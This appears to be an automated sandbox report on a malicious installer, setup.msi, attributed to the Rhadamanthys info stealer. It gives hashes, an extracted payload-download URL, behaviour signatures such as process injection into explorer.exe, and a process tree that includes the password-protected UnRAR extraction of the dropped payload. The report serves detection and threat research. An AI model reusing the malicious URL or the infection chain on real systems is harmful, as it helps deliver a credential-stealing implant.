Analysis
-
max time kernel
231s -
max time network
233s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
27-06-2024 00:44
Static task
static1
Behavioral task
behavioral1
Sample
setup.msi
Resource
win11-20240611-en
General
-
Target
setup.msi
-
Size
25.2MB
-
MD5
3d87a0e5517c9a8fc4adde50bafe7c76
-
SHA1
a1ba3b688dcb9b17ed1d430f3032e2884a0565e4
-
SHA256
49dc002fa1a0a1e33621a7d9340fb7bd0ac8b9834fc5958823d1f2bed6fa5956
-
SHA512
ebadfdc465dc5c32c854931a9f8712320cfc3752e04b3fec56a1b103c6f225c1de0c6892b1cd90b362f56d38685b8d5851e2cbefdf3291f8389b5cea2e337042
-
SSDEEP
393216:f+KUUMVzPuPA9BA/UODO0HAAqC+7Rw+lK2WhAS7KdROb7xmq7IrWowIpUDV5:f+YMVD9cECbq+QWhASOdM3N7gTwx
Malware Config
Extracted
https://gotry-gotry.com/2506s.bs64
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
explorer.exedescription pid process target process PID 1896 created 1320 1896 explorer.exe sihost.exe -
Blocklisted process makes network request 4 IoCs
Processes:
MsiExec.exepowershell.exeflow pid process 2 1000 MsiExec.exe 3 1000 MsiExec.exe 4 1000 MsiExec.exe 11 3360 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
steamerrorreporter64.exedescription pid process target process PID 4172 set thread context of 1896 4172 steamerrorreporter64.exe explorer.exe -
Drops file in Windows directory 24 IoCs
Processes:
msiexec.exeUserOOBEBroker.exedescription ioc process File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{4FC60505-AFAE-4294-8C0A-19D5DD0202F0} msiexec.exe File created C:\Windows\Installer\e577b8d.msi msiexec.exe File opened for modification C:\Windows\Panther\UnattendGC\setupact.log UserOOBEBroker.exe File opened for modification C:\Windows\Installer\MSI83BD.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\e577b89.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI7C55.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7C75.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7C86.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7CB7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI840C.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFFA823DD285715C26.TMP msiexec.exe File created C:\Windows\Installer\e577b89.msi msiexec.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml UserOOBEBroker.exe File opened for modification C:\Windows\Installer\MSI7C96.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF21FFABFCD633CCB9.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFB33D1417A1FDE386.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI8F09.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF746BB67D5CF40B16.TMP msiexec.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log UserOOBEBroker.exe File opened for modification C:\Windows\Installer\MSI7BD7.tmp msiexec.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml UserOOBEBroker.exe -
Executes dropped EXE 2 IoCs
Processes:
UnRAR.exesteamerrorreporter64.exepid process 2004 UnRAR.exe 4172 steamerrorreporter64.exe -
Loads dropped DLL 10 IoCs
Processes:
MsiExec.exesteamerrorreporter64.exepid process 1000 MsiExec.exe 1000 MsiExec.exe 1000 MsiExec.exe 1000 MsiExec.exe 1000 MsiExec.exe 1000 MsiExec.exe 1000 MsiExec.exe 1000 MsiExec.exe 4172 steamerrorreporter64.exe 4172 steamerrorreporter64.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 844 1896 WerFault.exe explorer.exe 3556 1896 WerFault.exe explorer.exe 5020 1896 WerFault.exe explorer.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133639229423965210" chrome.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1276817940-128734381-631578427-1000\{DF08ACE6-6E63-4F03-AC6D-3D4807E41099} msedge.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
msiexec.exepowershell.exeexplorer.exeopenwith.exemsedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exechrome.exepid process 324 msiexec.exe 324 msiexec.exe 3360 powershell.exe 3360 powershell.exe 1896 explorer.exe 1896 explorer.exe 1548 openwith.exe 1548 openwith.exe 1548 openwith.exe 1548 openwith.exe 3328 msedge.exe 3328 msedge.exe 948 msedge.exe 948 msedge.exe 3724 msedge.exe 3724 msedge.exe 1356 identity_helper.exe 1356 identity_helper.exe 3280 msedge.exe 3280 msedge.exe 1220 chrome.exe 1220 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
Processes:
msedge.exechrome.exepid process 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 1944 msiexec.exe Token: SeIncreaseQuotaPrivilege 1944 msiexec.exe Token: SeSecurityPrivilege 324 msiexec.exe Token: SeCreateTokenPrivilege 1944 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1944 msiexec.exe Token: SeLockMemoryPrivilege 1944 msiexec.exe Token: SeIncreaseQuotaPrivilege 1944 msiexec.exe Token: SeMachineAccountPrivilege 1944 msiexec.exe Token: SeTcbPrivilege 1944 msiexec.exe Token: SeSecurityPrivilege 1944 msiexec.exe Token: SeTakeOwnershipPrivilege 1944 msiexec.exe Token: SeLoadDriverPrivilege 1944 msiexec.exe Token: SeSystemProfilePrivilege 1944 msiexec.exe Token: SeSystemtimePrivilege 1944 msiexec.exe Token: SeProfSingleProcessPrivilege 1944 msiexec.exe Token: SeIncBasePriorityPrivilege 1944 msiexec.exe Token: SeCreatePagefilePrivilege 1944 msiexec.exe Token: SeCreatePermanentPrivilege 1944 msiexec.exe Token: SeBackupPrivilege 1944 msiexec.exe Token: SeRestorePrivilege 1944 msiexec.exe Token: SeShutdownPrivilege 1944 msiexec.exe Token: SeDebugPrivilege 1944 msiexec.exe Token: SeAuditPrivilege 1944 msiexec.exe Token: SeSystemEnvironmentPrivilege 1944 msiexec.exe Token: SeChangeNotifyPrivilege 1944 msiexec.exe Token: SeRemoteShutdownPrivilege 1944 msiexec.exe Token: SeUndockPrivilege 1944 msiexec.exe Token: SeSyncAgentPrivilege 1944 msiexec.exe Token: SeEnableDelegationPrivilege 1944 msiexec.exe Token: SeManageVolumePrivilege 1944 msiexec.exe Token: SeImpersonatePrivilege 1944 msiexec.exe Token: SeCreateGlobalPrivilege 1944 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe -
Suspicious use of FindShellTrayWindow 55 IoCs
Processes:
msiexec.exemsedge.exechrome.exepid process 1944 msiexec.exe 1944 msiexec.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exechrome.exepid process 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 948 msedge.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe -
Suspicious use of SetWindowsHookEx 43 IoCs
Processes:
osk.exechrome.exepid process 5084 osk.exe 5084 osk.exe 5084 osk.exe 5084 osk.exe 5084 osk.exe 5084 osk.exe 5084 osk.exe 5084 osk.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 5084 osk.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 5084 osk.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 5084 osk.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exesteamerrorreporter64.exeexplorer.exemsedge.exedescription pid process target process PID 324 wrote to memory of 1000 324 msiexec.exe MsiExec.exe PID 324 wrote to memory of 1000 324 msiexec.exe MsiExec.exe PID 324 wrote to memory of 1000 324 msiexec.exe MsiExec.exe PID 324 wrote to memory of 2004 324 msiexec.exe UnRAR.exe PID 324 wrote to memory of 2004 324 msiexec.exe UnRAR.exe PID 324 wrote to memory of 4172 324 msiexec.exe steamerrorreporter64.exe PID 324 wrote to memory of 4172 324 msiexec.exe steamerrorreporter64.exe PID 4172 wrote to memory of 1896 4172 steamerrorreporter64.exe explorer.exe PID 4172 wrote to memory of 1896 4172 steamerrorreporter64.exe explorer.exe PID 4172 wrote to memory of 1896 4172 steamerrorreporter64.exe explorer.exe PID 4172 wrote to memory of 1896 4172 steamerrorreporter64.exe explorer.exe PID 1896 wrote to memory of 3360 1896 explorer.exe powershell.exe PID 1896 wrote to memory of 3360 1896 explorer.exe powershell.exe PID 1896 wrote to memory of 1548 1896 explorer.exe openwith.exe PID 1896 wrote to memory of 1548 1896 explorer.exe openwith.exe PID 1896 wrote to memory of 1548 1896 explorer.exe openwith.exe PID 1896 wrote to memory of 1548 1896 explorer.exe openwith.exe PID 1896 wrote to memory of 1548 1896 explorer.exe openwith.exe PID 948 wrote to memory of 804 948 msedge.exe msedge.exe PID 948 wrote to memory of 804 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 956 948 msedge.exe msedge.exe PID 948 wrote to memory of 3328 948 msedge.exe msedge.exe PID 948 wrote to memory of 3328 948 msedge.exe msedge.exe PID 948 wrote to memory of 1628 948 msedge.exe msedge.exe PID 948 wrote to memory of 1628 948 msedge.exe msedge.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://www.bing.com/search?q=windows%2011%20keyboard%20shortcuts%20site:microsoft.com&form=B00032&ocid=SettingsHAQ-BingIA&mkt=en-US2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffb38c63cb8,0x7ffb38c63cc8,0x7ffb38c63cd83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5356 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5028 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3448 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:13⤵
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8D0724BC2649207211B6B8DB7F9A763A2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\UnRAR.exe"C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\UnRAR.exe" x -p2664926658a "C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\steamerrorreporter64.exe"C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\steamerrorreporter64.exe"2⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe explorer.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
